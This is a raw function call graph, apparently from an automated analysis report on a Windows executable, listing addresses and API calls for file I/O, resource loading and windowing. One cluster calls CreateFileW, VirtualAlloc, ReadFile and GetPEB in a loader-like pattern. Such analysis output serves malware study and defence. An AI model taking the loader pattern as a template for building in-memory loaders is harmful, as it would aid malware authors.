96091 ab44e1 96089->96091 96090 af3848 96093 af384c 96090->96093 96094 af3869 96090->96094 96091->96087 96092 ab44e9 96091->96092 96095 af3854 96092->96095 96096 ab44f5 96092->96096 96203 ab4f39 96093->96203 96098 acfe0b 22 API calls 96094->96098 96209 b1da5a 82 API calls 96095->96209 96202 ab940c 136 API calls 2 library calls 96096->96202 96101 af38ae 96098->96101 96104 af3a5f 96101->96104 96110 ab9cb3 22 API calls 96101->96110 96210 b1967e 22 API calls __fread_nolock 96101->96210 96211 b195ad 42 API calls _wcslen 96101->96211 96212 b20b5a 22 API calls 96101->96212 96213 aba4a1 22 API calls __fread_nolock 96101->96213 96214 ab3ff7 22 API calls 96101->96214 96102 ab2e31 96103 af3862 96103->96094 96105 ab4f39 68 API calls 96104->96105 96215 b1989b 82 API calls __wsopen_s 96104->96215 96105->96104 96110->96101 96114 ab6b67 _wcslen 96113->96114 96115 af4ba1 96113->96115 96118 ab6b7d 96114->96118 96119 ab6ba2 96114->96119 96116 ab93b2 22 API calls 96115->96116 96117 af4baa 96116->96117 96117->96117 96847 ab6f34 22 API calls 96118->96847 96121 acfddb 22 API calls 96119->96121 96123 ab6bae 96121->96123 96122 ab6b85 __fread_nolock 96122->96052 96124 acfe0b 22 API calls 96123->96124 96124->96122 96126 ab3aaf GetFullPathNameW 96125->96126 96126->96059 96126->96060 96128 ab37ae 96127->96128 96137 ab93b2 96128->96137 96130 ab2e12 96130->96066 96132 aba6dd 96131->96132 96136 aba6d0 96131->96136 96133 acfddb 22 API calls 96132->96133 96134 aba6e7 96133->96134 96135 acfe0b 22 API calls 96134->96135 96135->96136 96136->96063 96138 ab93c0 96137->96138 96139 ab93c9 __fread_nolock 96137->96139 96138->96139 96140 abaec9 22 API calls 96138->96140 96139->96130 96139->96139 96140->96139 96142 ab516e 96141->96142 96146 ab518f __fread_nolock 96141->96146 96144 acfe0b 22 API calls 96142->96144 96143 acfddb 22 API calls 96145 ab35cc 96143->96145 96144->96146 96147 ab35f3 96145->96147 96146->96143 96149 ab3605 96147->96149 96152 ab3624 __fread_nolock 96147->96152 96148 acfddb 22 API calls 96150 ab363b 96148->96150 96151 acfe0b 22 API calls 96149->96151 96150->96083 96151->96152 96152->96148 96153->96076 96216 ab4e90 LoadLibraryA 96154->96216 96159 af3ccf 96161 ab4f39 68 API calls 96159->96161 96160 ab4ef6 LoadLibraryExW 96224 ab4e59 LoadLibraryA 96160->96224 96163 af3cd6 96161->96163 96165 ab4e59 3 API calls 96163->96165 96167 af3cde 96165->96167 96246 ab50f5 96167->96246 96168 ab4f20 96168->96167 96169 ab4f2c 96168->96169 96170 ab4f39 68 API calls 96169->96170 96172 ab44cd 96170->96172 96172->96087 96172->96089 96175 af3d05 96177 b22d15 96176->96177 96178 ab511f 64 API calls 96177->96178 96179 b22d29 96178->96179 96517 b22e66 96179->96517 96182 ab50f5 40 API calls 96183 b22d56 96182->96183 96184 ab50f5 40 API calls 96183->96184 96185 b22d66 96184->96185 96186 ab50f5 40 API calls 96185->96186 96187 b22d81 96186->96187 96188 ab50f5 40 API calls 96187->96188 96189 b22d9c 96188->96189 96190 ab511f 64 API calls 96189->96190 96191 b22db3 96190->96191 96192 adea0c ___std_exception_copy 21 API calls 96191->96192 96193 b22dba 96192->96193 96194 adea0c ___std_exception_copy 21 API calls 96193->96194 96195 b22dc4 96194->96195 96196 ab50f5 40 API calls 96195->96196 96197 b22dd8 96196->96197 96198 b228fe 27 API calls 96197->96198 96200 b22dee 96198->96200 96199 b22d3f 96199->96090 96200->96199 96523 b222ce 96200->96523 96202->96102 96204 ab4f4a 96203->96204 96205 ab4f43 96203->96205 96207 ab4f6a FreeLibrary 96204->96207 96208 ab4f59 96204->96208 96206 ade678 67 API calls 96205->96206 96206->96204 96207->96208 96208->96095 96209->96103 96210->96101 96211->96101 96212->96101 96213->96101 96214->96101 96215->96104 96217 ab4ea8 GetProcAddress 96216->96217 96218 ab4ec6 96216->96218 96219 ab4eb8 96217->96219 96221 ade5eb 96218->96221 96219->96218 96220 ab4ebf FreeLibrary 96219->96220 96220->96218 96254 ade52a 96221->96254 96223 ab4eea 96223->96159 96223->96160 96225 ab4e6e GetProcAddress 96224->96225 96226 ab4e8d 96224->96226 96227 ab4e7e 96225->96227 96229 ab4f80 96226->96229 96227->96226 96228 ab4e86 FreeLibrary 96227->96228 96228->96226 96230 acfe0b 22 API calls 96229->96230 96231 ab4f95 96230->96231 96322 ab5722 96231->96322 96233 ab4fa1 __fread_nolock 96234 af3d1d 96233->96234 96235 ab50a5 96233->96235 96245 ab4fdc 96233->96245 96336 b2304d 74 API calls 96234->96336 96325 ab42a2 CreateStreamOnHGlobal 96235->96325 96238 af3d22 96240 ab511f 64 API calls 96238->96240 96239 ab50f5 40 API calls 96239->96245 96241 af3d45 96240->96241 96242 ab50f5 40 API calls 96241->96242 96244 ab506e ISource 96242->96244 96244->96168 96245->96238 96245->96239 96245->96244 96331 ab511f 96245->96331 96247 ab5107 96246->96247 96248 af3d70 96246->96248 96358 ade8c4 96247->96358 96251 b228fe 96500 b2274e 96251->96500 96253 b22919 96253->96175 96257 ade536 ___scrt_is_nonwritable_in_current_image 96254->96257 96255 ade544 96279 adf2d9 20 API calls __dosmaperr 96255->96279 96257->96255 96259 ade574 96257->96259 96258 ade549 96280 ae27ec 26 API calls pre_c_initialization 96258->96280 96261 ade579 96259->96261 96262 ade586 96259->96262 96281 adf2d9 20 API calls __dosmaperr 96261->96281 96271 ae8061 96262->96271 96265 ade58f 96266 ade595 96265->96266 96267 ade5a2 96265->96267 96282 adf2d9 20 API calls __dosmaperr 96266->96282 96283 ade5d4 LeaveCriticalSection __fread_nolock 96267->96283 96268 ade554 __wsopen_s 96268->96223 96272 ae806d ___scrt_is_nonwritable_in_current_image 96271->96272 96284 ae2f5e EnterCriticalSection 96272->96284 96274 ae807b 96285 ae80fb 96274->96285 96278 ae80ac __wsopen_s 96278->96265 96279->96258 96280->96268 96281->96268 96282->96268 96283->96268 96284->96274 96293 ae811e 96285->96293 96286 ae8088 96298 ae80b7 96286->96298 96287 ae8177 96303 ae4c7d 96287->96303 96292 ae8189 96292->96286 96316 ae3405 11 API calls 2 library calls 96292->96316 96293->96286 96293->96287 96293->96293 96301 ad918d EnterCriticalSection 96293->96301 96302 ad91a1 LeaveCriticalSection 96293->96302 96295 ae81a8 96317 ad918d EnterCriticalSection 96295->96317 96321 ae2fa6 LeaveCriticalSection 96298->96321 96300 ae80be 96300->96278 96301->96293 96302->96293 96308 ae4c8a __dosmaperr 96303->96308 96304 ae4cca 96319 adf2d9 20 API calls __dosmaperr 96304->96319 96305 ae4cb5 RtlAllocateHeap 96306 ae4cc8 96305->96306 96305->96308 96310 ae29c8 96306->96310 96308->96304 96308->96305 96318 ad4ead 7 API calls 2 library calls 96308->96318 96311 ae29d3 RtlFreeHeap 96310->96311 96312 ae29fc __dosmaperr 96310->96312 96311->96312 96313 ae29e8 96311->96313 96312->96292 96320 adf2d9 20 API calls __dosmaperr 96313->96320 96315 ae29ee GetLastError 96315->96312 96316->96295 96317->96286 96318->96308 96319->96306 96320->96315 96321->96300 96323 acfddb 22 API calls 96322->96323 96324 ab5734 96323->96324 96324->96233 96326 ab42bc FindResourceExW 96325->96326 96330 ab42d9 96325->96330 96327 af35ba LoadResource 96326->96327 96326->96330 96328 af35cf SizeofResource 96327->96328 96327->96330 96329 af35e3 LockResource 96328->96329 96328->96330 96329->96330 96330->96245 96332 ab512e 96331->96332 96333 af3d90 96331->96333 96337 adece3 96332->96337 96336->96238 96340 adeaaa 96337->96340 96339 ab513c 96339->96245 96343 adeab6 ___scrt_is_nonwritable_in_current_image 96340->96343 96341 adeac2 96353 adf2d9 20 API calls __dosmaperr 96341->96353 96343->96341 96344 adeae8 96343->96344 96355 ad918d EnterCriticalSection 96344->96355 96346 adeac7 96354 ae27ec 26 API calls pre_c_initialization 96346->96354 96347 adeaf4 96356 adec0a 62 API calls 2 library calls 96347->96356 96350 adeb08 96357 adeb27 LeaveCriticalSection __fread_nolock 96350->96357 96352 adead2 __wsopen_s 96352->96339 96353->96346 96354->96352 96355->96347 96356->96350 96357->96352 96361 ade8e1 96358->96361 96360 ab5118 96360->96251 96362 ade8ed ___scrt_is_nonwritable_in_current_image 96361->96362 96363 ade925 __wsopen_s 96362->96363 96364 ade92d 96362->96364 96365 ade900 ___scrt_fastfail 96362->96365 96363->96360 96374 ad918d EnterCriticalSection 96364->96374 96388 adf2d9 20 API calls __dosmaperr 96365->96388 96368 ade937 96375 ade6f8 96368->96375 96369 ade91a 96389 ae27ec 26 API calls pre_c_initialization 96369->96389 96374->96368 96376 ade727 96375->96376 96379 ade70a ___scrt_fastfail 96375->96379 96390 ade96c LeaveCriticalSection __fread_nolock 96376->96390 96377 ade717 96463 adf2d9 20 API calls __dosmaperr 96377->96463 96379->96376 96379->96377 96381 ade76a __fread_nolock 96379->96381 96381->96376 96382 ade886 ___scrt_fastfail 96381->96382 96391 add955 96381->96391 96398 ae8d45 96381->96398 96465 adcf78 26 API calls 4 library calls 96381->96465 96466 adf2d9 20 API calls __dosmaperr 96382->96466 96386 ade71c 96464 ae27ec 26 API calls pre_c_initialization 96386->96464 96388->96369 96389->96363 96390->96363 96392 add976 96391->96392 96393 add961 96391->96393 96392->96381 96467 adf2d9 20 API calls __dosmaperr 96393->96467 96395 add966 96468 ae27ec 26 API calls pre_c_initialization 96395->96468 96397 add971 96397->96381 96399 ae8d6f 96398->96399 96400 ae8d57 96398->96400 96402 ae90d9 96399->96402 96405 ae8db4 96399->96405 96478 adf2c6 20 API calls __dosmaperr 96400->96478 96494 adf2c6 20 API calls __dosmaperr 96402->96494 96403 ae8d5c 96479 adf2d9 20 API calls __dosmaperr 96403->96479 96408 ae8dbf 96405->96408 96409 ae8d64 96405->96409 96416 ae8def 96405->96416 96407 ae90de 96495 adf2d9 20 API calls __dosmaperr 96407->96495 96480 adf2c6 20 API calls __dosmaperr 96408->96480 96409->96381 96412 ae8dcc 96496 ae27ec 26 API calls pre_c_initialization 96412->96496 96413 ae8dc4 96481 adf2d9 20 API calls __dosmaperr 96413->96481 96417 ae8e08 96416->96417 96418 ae8e2e 96416->96418 96419 ae8e4a 96416->96419 96417->96418 96452 ae8e15 96417->96452 96482 adf2c6 20 API calls __dosmaperr 96418->96482 96485 ae3820 21 API calls __dosmaperr 96419->96485 96421 ae8e33 96483 adf2d9 20 API calls __dosmaperr 96421->96483 96425 ae8e61 96428 ae29c8 _free 20 API calls 96425->96428 96426 ae8e3a 96484 ae27ec 26 API calls pre_c_initialization 96426->96484 96427 ae8fb3 96430 ae9029 96427->96430 96433 ae8fcc GetConsoleMode 96427->96433 96431 ae8e6a 96428->96431 96432 ae902d ReadFile 96430->96432 96434 ae29c8 _free 20 API calls 96431->96434 96435 ae9047 96432->96435 96436 ae90a1 GetLastError 96432->96436 96433->96430 96437 ae8fdd 96433->96437 96438 ae8e71 96434->96438 96435->96436 96441 ae901e 96435->96441 96439 ae90ae 96436->96439 96440 ae9005 96436->96440 96437->96432 96442 ae8fe3 ReadConsoleW 96437->96442 96443 ae8e7b 96438->96443 96444 ae8e96 96438->96444 96492 adf2d9 20 API calls __dosmaperr 96439->96492 96461 ae8e45 __fread_nolock 96440->96461 96489 adf2a3 20 API calls __dosmaperr 96440->96489 96456 ae906c 96441->96456 96457 ae9083 96441->96457 96441->96461 96442->96441 96448 ae8fff GetLastError 96442->96448 96486 adf2d9 20 API calls __dosmaperr 96443->96486 96488 ae9424 28 API calls __wsopen_s 96444->96488 96448->96440 96449 ae29c8 _free 20 API calls 96449->96409 96450 ae8e80 96487 adf2c6 20 API calls __dosmaperr 96450->96487 96451 ae90b3 96493 adf2c6 20 API calls __dosmaperr 96451->96493 96469 aef89b 96452->96469 96490 ae8a61 31 API calls 3 library calls 96456->96490 96459 ae909a 96457->96459 96457->96461 96491 ae88a1 29 API calls __wsopen_s 96459->96491 96461->96449 96462 ae909f 96462->96461 96463->96386 96464->96376 96465->96381 96466->96386 96467->96395 96468->96397 96470 aef8a8 96469->96470 96471 aef8b5 96469->96471 96497 adf2d9 20 API calls __dosmaperr 96470->96497 96473 aef8c1 96471->96473 96498 adf2d9 20 API calls __dosmaperr 96471->96498 96473->96427 96475 aef8ad 96475->96427 96476 aef8e2 96499 ae27ec 26 API calls pre_c_initialization 96476->96499 96478->96403 96479->96409 96480->96413 96481->96412 96482->96421 96483->96426 96484->96461 96485->96425 96486->96450 96487->96461 96488->96452 96489->96461 96490->96461 96491->96462 96492->96451 96493->96461 96494->96407 96495->96412 96496->96409 96497->96475 96498->96476 96499->96475 96503 ade4e8 96500->96503 96502 b2275d 96502->96253 96506 ade469 96503->96506 96505 ade505 96505->96502 96507 ade48c 96506->96507 96508 ade478 96506->96508 96513 ade488 __alldvrm 96507->96513 96516 ae333f 11 API calls 2 library calls 96507->96516 96514 adf2d9 20 API calls __dosmaperr 96508->96514 96510 ade47d 96515 ae27ec 26 API calls pre_c_initialization 96510->96515 96513->96505 96514->96510 96515->96513 96516->96513 96522 b22e7a 96517->96522 96518 ab50f5 40 API calls 96518->96522 96519 b22d3b 96519->96182 96519->96199 96520 b228fe 27 API calls 96520->96522 96521 ab511f 64 API calls 96521->96522 96522->96518 96522->96519 96522->96520 96522->96521 96524 b222e7 96523->96524 96525 b222d9 96523->96525 96527 b2232c 96524->96527 96528 ade5eb 29 API calls 96524->96528 96538 b222f0 96524->96538 96526 ade5eb 29 API calls 96525->96526 96526->96524 96552 b22557 96527->96552 96529 b22311 96528->96529 96529->96527 96531 b2231a 96529->96531 96535 ade678 67 API calls 96531->96535 96531->96538 96532 b22370 96533 b22374 96532->96533 96534 b22395 96532->96534 96537 b22381 96533->96537 96540 ade678 67 API calls 96533->96540 96556 b22171 96534->96556 96535->96538 96537->96538 96541 ade678 67 API calls 96537->96541 96538->96199 96539 b2239d 96542 b223c3 96539->96542 96543 b223a3 96539->96543 96540->96537 96541->96538 96563 b223f3 96542->96563 96545 b223b0 96543->96545 96546 ade678 67 API calls 96543->96546 96545->96538 96547 ade678 67 API calls 96545->96547 96546->96545 96547->96538 96548 b223ca 96550 b223de 96548->96550 96571 ade678 96548->96571 96550->96538 96551 ade678 67 API calls 96550->96551 96551->96538 96553 b2257c 96552->96553 96555 b22565 __fread_nolock 96552->96555 96554 ade8c4 __fread_nolock 40 API calls 96553->96554 96554->96555 96555->96532 96557 adea0c ___std_exception_copy 21 API calls 96556->96557 96558 b2217f 96557->96558 96559 adea0c ___std_exception_copy 21 API calls 96558->96559 96560 b22190 96559->96560 96561 adea0c ___std_exception_copy 21 API calls 96560->96561 96562 b2219c 96561->96562 96562->96539 96565 b22408 96563->96565 96564 b224c0 96588 b22724 96564->96588 96565->96564 96567 b221cc 40 API calls 96565->96567 96570 b224c7 96565->96570 96584 b22606 96565->96584 96592 b22269 40 API calls 96565->96592 96567->96565 96570->96548 96572 ade684 ___scrt_is_nonwritable_in_current_image 96571->96572 96573 ade6aa 96572->96573 96574 ade695 96572->96574 96583 ade6a5 __wsopen_s 96573->96583 96628 ad918d EnterCriticalSection 96573->96628 96645 adf2d9 20 API calls __dosmaperr 96574->96645 96577 ade69a 96646 ae27ec 26 API calls pre_c_initialization 96577->96646 96578 ade6c6 96629 ade602 96578->96629 96581 ade6d1 96647 ade6ee LeaveCriticalSection __fread_nolock 96581->96647 96583->96550 96585 b22617 96584->96585 96586 b2261d 96584->96586 96585->96586 96593 b226d7 96585->96593 96586->96565 96589 b22731 96588->96589 96591 b22742 96588->96591 96590 addbb3 65 API calls 96589->96590 96590->96591 96591->96570 96592->96565 96594 b22703 96593->96594 96595 b22714 96593->96595 96597 addbb3 96594->96597 96595->96585 96598 addbdd 96597->96598 96599 addbc1 96597->96599 96598->96595 96599->96598 96600 addbcd 96599->96600 96601 addbe3 96599->96601 96609 adf2d9 20 API calls __dosmaperr 96600->96609 96606 add9cc 96601->96606 96604 addbd2 96610 ae27ec 26 API calls pre_c_initialization 96604->96610 96611 add97b 96606->96611 96608 add9f0 96608->96598 96609->96604 96610->96598 96612 add987 ___scrt_is_nonwritable_in_current_image 96611->96612 96619 ad918d EnterCriticalSection 96612->96619 96614 add995 96620 add9f4 96614->96620 96618 add9b3 __wsopen_s 96618->96608 96619->96614 96621 ae49a1 27 API calls 96620->96621 96622 adda09 96621->96622 96623 adda3a 62 API calls 96622->96623 96624 adda24 96623->96624 96625 ae4a56 62 API calls 96624->96625 96626 add9a2 96625->96626 96627 add9c0 LeaveCriticalSection __fread_nolock 96626->96627 96627->96618 96628->96578 96630 ade60f 96629->96630 96631 ade624 96629->96631 96673 adf2d9 20 API calls __dosmaperr 96630->96673 96637 ade61f 96631->96637 96648 addc0b 96631->96648 96633 ade614 96674 ae27ec 26 API calls pre_c_initialization 96633->96674 96637->96581 96640 add955 __fread_nolock 26 API calls 96641 ade646 96640->96641 96658 ae862f 96641->96658 96644 ae29c8 _free 20 API calls 96644->96637 96645->96577 96646->96583 96647->96583 96649 addc23 96648->96649 96651 addc1f 96648->96651 96650 add955 __fread_nolock 26 API calls 96649->96650 96649->96651 96652 addc43 96650->96652 96654 ae4d7a 96651->96654 96675 ae59be 96652->96675 96655 ade640 96654->96655 96656 ae4d90 96654->96656 96655->96640 96656->96655 96657 ae29c8 _free 20 API calls 96656->96657 96657->96655 96659 ae863e 96658->96659 96660 ae8653 96658->96660 96798 adf2c6 20 API calls __dosmaperr 96659->96798 96661 ae868e 96660->96661 96665 ae867a 96660->96665 96800 adf2c6 20 API calls __dosmaperr 96661->96800 96664 ae8643 96799 adf2d9 20 API calls __dosmaperr 96664->96799 96795 ae8607 96665->96795 96666 ae8693 96801 adf2d9 20 API calls __dosmaperr 96666->96801 96670 ade64c 96670->96637 96670->96644 96671 ae869b 96802 ae27ec 26 API calls pre_c_initialization 96671->96802 96673->96633 96674->96637 96676 ae59ca ___scrt_is_nonwritable_in_current_image 96675->96676 96677 ae59ea 96676->96677 96678 ae59d2 96676->96678 96680 ae5a88 96677->96680 96685 ae5a1f 96677->96685 96754 adf2c6 20 API calls __dosmaperr 96678->96754 96759 adf2c6 20 API calls __dosmaperr 96680->96759 96681 ae59d7 96755 adf2d9 20 API calls __dosmaperr 96681->96755 96684 ae5a8d 96760 adf2d9 20 API calls __dosmaperr 96684->96760 96700 ae5147 EnterCriticalSection 96685->96700 96686 ae59df __wsopen_s 96686->96651 96689 ae5a95 96761 ae27ec 26 API calls pre_c_initialization 96689->96761 96690 ae5a25 96692 ae5a56 96690->96692 96693 ae5a41 96690->96693 96701 ae5aa9 96692->96701 96756 adf2d9 20 API calls __dosmaperr 96693->96756 96696 ae5a51 96758 ae5a80 LeaveCriticalSection __wsopen_s 96696->96758 96697 ae5a46 96757 adf2c6 20 API calls __dosmaperr 96697->96757 96700->96690 96702 ae5ad7 96701->96702 96740 ae5ad0 96701->96740 96703 ae5afa 96702->96703 96704 ae5adb 96702->96704 96708 ae5b4b 96703->96708 96709 ae5b2e 96703->96709 96769 adf2c6 20 API calls __dosmaperr 96704->96769 96707 ae5ae0 96770 adf2d9 20 API calls __dosmaperr 96707->96770 96712 ae5b61 96708->96712 96775 ae9424 28 API calls __wsopen_s 96708->96775 96772 adf2c6 20 API calls __dosmaperr 96709->96772 96710 ae5cb1 96710->96696 96762 ae564e 96712->96762 96714 ae5ae7 96771 ae27ec 26 API calls pre_c_initialization 96714->96771 96717 ae5b33 96773 adf2d9 20 API calls __dosmaperr 96717->96773 96721 ae5b3b 96774 ae27ec 26 API calls pre_c_initialization 96721->96774 96722 ae5b6f 96727 ae5b95 96722->96727 96728 ae5b73 96722->96728 96723 ae5ba8 96725 ae5bbc 96723->96725 96726 ae5c02 WriteFile 96723->96726 96731 ae5bc4 96725->96731 96732 ae5bf2 96725->96732 96729 ae5c25 GetLastError 96726->96729 96734 ae5b8b 96726->96734 96777 ae542e 45 API calls 3 library calls 96727->96777 96733 ae5c69 96728->96733 96776 ae55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96728->96776 96729->96734 96735 ae5bc9 96731->96735 96736 ae5be2 96731->96736 96780 ae56c4 7 API calls 2 library calls 96732->96780 96733->96740 96784 adf2d9 20 API calls __dosmaperr 96733->96784 96734->96733 96734->96740 96745 ae5c45 96734->96745 96735->96733 96742 ae5bd2 96735->96742 96779 ae5891 8 API calls 2 library calls 96736->96779 96739 ae5be0 96739->96734 96786 ad0a8c 96740->96786 96778 ae57a3 7 API calls 2 library calls 96742->96778 96744 ae5c8e 96785 adf2c6 20 API calls __dosmaperr 96744->96785 96748 ae5c4c 96745->96748 96749 ae5c60 96745->96749 96781 adf2d9 20 API calls __dosmaperr 96748->96781 96783 adf2a3 20 API calls __dosmaperr 96749->96783 96752 ae5c51 96782 adf2c6 20 API calls __dosmaperr 96752->96782 96754->96681 96755->96686 96756->96697 96757->96696 96758->96686 96759->96684 96760->96689 96761->96686 96763 aef89b __fread_nolock 26 API calls 96762->96763 96764 ae565e 96763->96764 96765 ae5663 96764->96765 96793 ae2d74 38 API calls 3 library calls 96764->96793 96765->96722 96765->96723 96767 ae56a4 GetConsoleMode 96767->96765 96768 ae5686 96768->96765 96768->96767 96769->96707 96770->96714 96771->96740 96772->96717 96773->96721 96774->96740 96775->96712 96776->96734 96777->96734 96778->96739 96779->96739 96780->96739 96781->96752 96782->96740 96783->96740 96784->96744 96785->96740 96787 ad0a95 96786->96787 96788 ad0a97 IsProcessorFeaturePresent 96786->96788 96787->96710 96790 ad0c5d 96788->96790 96794 ad0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96790->96794 96792 ad0d40 96792->96710 96793->96768 96794->96792 96803 ae8585 96795->96803 96797 ae862b 96797->96670 96798->96664 96799->96670 96800->96666 96801->96671 96802->96670 96804 ae8591 ___scrt_is_nonwritable_in_current_image 96803->96804 96814 ae5147 EnterCriticalSection 96804->96814 96806 ae859f 96807 ae85c6 96806->96807 96808 ae85d1 96806->96808 96815 ae86ae 96807->96815 96830 adf2d9 20 API calls __dosmaperr 96808->96830 96811 ae85cc 96831 ae85fb LeaveCriticalSection __wsopen_s 96811->96831 96813 ae85ee __wsopen_s 96813->96797 96814->96806 96832 ae53c4 96815->96832 96817 ae86c4 96845 ae5333 21 API calls 2 library calls 96817->96845 96818 ae86be 96818->96817 96820 ae53c4 __wsopen_s 26 API calls 96818->96820 96829 ae86f6 96818->96829 96822 ae86ed 96820->96822 96821 ae53c4 __wsopen_s 26 API calls 96823 ae8702 CloseHandle 96821->96823 96826 ae53c4 __wsopen_s 26 API calls 96822->96826 96823->96817 96827 ae870e GetLastError 96823->96827 96824 ae871c 96825 ae873e 96824->96825 96846 adf2a3 20 API calls __dosmaperr 96824->96846 96825->96811 96826->96829 96827->96817 96829->96817 96829->96821 96830->96811 96831->96813 96833 ae53e6 96832->96833 96834 ae53d1 96832->96834 96837 adf2c6 __dosmaperr 20 API calls 96833->96837 96839 ae540b 96833->96839 96835 adf2c6 __dosmaperr 20 API calls 96834->96835 96836 ae53d6 96835->96836 96838 adf2d9 __dosmaperr 20 API calls 96836->96838 96840 ae5416 96837->96840 96842 ae53de 96838->96842 96839->96818 96841 adf2d9 __dosmaperr 20 API calls 96840->96841 96843 ae541e 96841->96843 96842->96818 96844 ae27ec pre_c_initialization 26 API calls 96843->96844 96844->96842 96845->96824 96846->96825 96847->96122 96848 180de68 96862 180baa8 96848->96862 96850 180df38 96865 180dd58 96850->96865 96852 180df61 CreateFileW 96854 180dfb0 96852->96854 96855 180dfb5 96852->96855 96855->96854 96856 180dfcc VirtualAlloc 96855->96856 96856->96854 96857 180dfed ReadFile 96856->96857 96857->96854 96858 180e008 96857->96858 96859 180cb18 12 API calls 96858->96859 96860 180e022 96859->96860 96861 180cd58 GetPEB GetPEB 96860->96861 96861->96854 96864 180c133 96862->96864 96868 180ef78 GetPEB 96862->96868 96864->96850 96866 180dd61 Sleep 96865->96866 96867 180dd6f 96866->96867 96868->96864 96869 af2ba5 96870 af2baf 96869->96870 96871 ab2b25 96869->96871 96903 ab3a5a 96870->96903 96897 ab2b83 7 API calls 96871->96897 96875 af2bb8 96910 ab9cb3 96875->96910 96878 af2bc6 96880 af2bce 96878->96880 96881 af2bf5 96878->96881 96879 ab2b2f 96887 ab2b44 96879->96887 96901 ab3837 49 API calls ___scrt_fastfail 96879->96901 96916 ab33c6 96880->96916 96884 ab33c6 22 API calls 96881->96884 96886 af2bf1 GetForegroundWindow ShellExecuteW 96884->96886 96893 af2c26 96886->96893 96888 ab2b5f 96887->96888 96902 ab30f2 Shell_NotifyIconW ___scrt_fastfail 96887->96902 96895 ab2b66 SetCurrentDirectoryW 96888->96895 96893->96888 96894 ab33c6 22 API calls 96894->96886 96896 ab2b7a 96895->96896 96934 ab2cd4 7 API calls 96897->96934 96899 ab2b2a 96900 ab2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96899->96900 96900->96879 96901->96887 96902->96888 96904 af1f50 __wsopen_s 96903->96904 96905 ab3a67 GetModuleFileNameW 96904->96905 96906 ab9cb3 22 API calls 96905->96906 96907 ab3a8d 96906->96907 96908 ab3aa2 23 API calls 96907->96908 96909 ab3a97 96908->96909 96909->96875 96911 ab9cc2 _wcslen 96910->96911 96912 acfe0b 22 API calls 96911->96912 96913 ab9cea __fread_nolock 96912->96913 96914 acfddb 22 API calls 96913->96914 96915 ab9d00 96914->96915 96915->96878 96917 af30bb 96916->96917 96918 ab33dd 96916->96918 96919 acfddb 22 API calls 96917->96919 96935 ab33ee 96918->96935 96922 af30c5 _wcslen 96919->96922 96921 ab33e8 96925 ab6350 96921->96925 96923 acfe0b 22 API calls 96922->96923 96924 af30fe __fread_nolock 96923->96924 96926 ab6362 96925->96926 96927 af4a51 96925->96927 96950 ab6373 96926->96950 96960 ab4a88 22 API calls __fread_nolock 96927->96960 96930 ab636e 96930->96894 96931 af4a5b 96932 af4a67 96931->96932 96933 aba8c7 22 API calls 96931->96933 96933->96932 96934->96899 96936 ab33fe _wcslen 96935->96936 96937 af311d 96936->96937 96938 ab3411 96936->96938 96940 acfddb 22 API calls 96937->96940 96945 aba587 96938->96945 96942 af3127 96940->96942 96941 ab341e __fread_nolock 96941->96921 96943 acfe0b 22 API calls 96942->96943 96944 af3157 __fread_nolock 96943->96944 96947 aba59d 96945->96947 96949 aba598 __fread_nolock 96945->96949 96946 aff80f 96947->96946 96948 acfe0b 22 API calls 96947->96948 96948->96949 96949->96941 96951 ab6382 96950->96951 96956 ab63b6 __fread_nolock 96950->96956 96952 af4a82 96951->96952 96953 ab63a9 96951->96953 96951->96956 96955 acfddb 22 API calls 96952->96955 96954 aba587 22 API calls 96953->96954 96954->96956 96957 af4a91 96955->96957 96956->96930 96958 acfe0b 22 API calls 96957->96958 96959 af4ac5 __fread_nolock 96958->96959 96960->96931 96961 ae8402 96966 ae81be 96961->96966 96964 ae842a 96971 ae81ef try_get_first_available_module 96966->96971 96968 ae83ee 96985 ae27ec 26 API calls pre_c_initialization 96968->96985 96970 ae8343 96970->96964 96978 af0984 96970->96978 96971->96971 96974 ae8338 96971->96974 96981 ad8e0b 40 API calls 2 library calls 96971->96981 96973 ae838c 96973->96974 96982 ad8e0b 40 API calls 2 library calls 96973->96982 96974->96970 96984 adf2d9 20 API calls __dosmaperr 96974->96984 96976 ae83ab 96976->96974 96983 ad8e0b 40 API calls 2 library calls 96976->96983 96986 af0081 96978->96986 96980 af099f 96980->96964 96981->96973 96982->96976 96983->96974 96984->96968 96985->96970 96988 af008d ___scrt_is_nonwritable_in_current_image 96986->96988 96987 af009b 97044 adf2d9 20 API calls __dosmaperr 96987->97044 96988->96987 96990 af00d4 96988->96990 96997 af065b 96990->96997 96991 af00a0 97045 ae27ec 26 API calls pre_c_initialization 96991->97045 96996 af00aa __wsopen_s 96996->96980 97047 af042f 96997->97047 97000 af068d 97079 adf2c6 20 API calls __dosmaperr 97000->97079 97001 af06a6 97065 ae5221 97001->97065 97004 af06ab 97005 af06cb 97004->97005 97006 af06b4 97004->97006 97078 af039a CreateFileW 97005->97078 97081 adf2c6 20 API calls __dosmaperr 97006->97081 97010 af06b9 97082 adf2d9 20 API calls __dosmaperr 97010->97082 97012 af0781 GetFileType 97014 af078c GetLastError 97012->97014 97019 af07d3 97012->97019 97013 af0756 GetLastError 97084 adf2a3 20 API calls __dosmaperr 97013->97084 97085 adf2a3 20 API calls __dosmaperr 97014->97085 97016 af0704 97016->97012 97016->97013 97083 af039a CreateFileW 97016->97083 97018 af079a CloseHandle 97021 af0692 97018->97021 97022 af07c3 97018->97022 97087 ae516a 21 API calls 2 library calls 97019->97087 97080 adf2d9 20 API calls __dosmaperr 97021->97080 97086 adf2d9 20 API calls __dosmaperr 97022->97086 97024 af0749 97024->97012 97024->97013 97026 af07f4 97028 af0840 97026->97028 97088 af05ab 72 API calls 3 library calls 97026->97088 97027 af07c8 97027->97021 97033 af086d 97028->97033 97089 af014d 72 API calls 4 library calls 97028->97089 97031 af0866 97032 af087e 97031->97032 97031->97033 97035 af00f8 97032->97035 97036 af08fc CloseHandle 97032->97036 97034 ae86ae __wsopen_s 29 API calls 97033->97034 97034->97035 97046 af0121 LeaveCriticalSection __wsopen_s 97035->97046 97090 af039a CreateFileW 97036->97090 97038 af0927 97039 af095d 97038->97039 97040 af0931 GetLastError 97038->97040 97039->97035 97091 adf2a3 20 API calls __dosmaperr 97040->97091 97042 af093d 97092 ae5333 21 API calls 2 library calls 97042->97092 97044->96991 97045->96996 97046->96996 97048 af046a 97047->97048 97049 af0450 97047->97049 97093 af03bf 97048->97093 97049->97048 97100 adf2d9 20 API calls __dosmaperr 97049->97100 97052 af04a2 97055 af04d1 97052->97055 97102 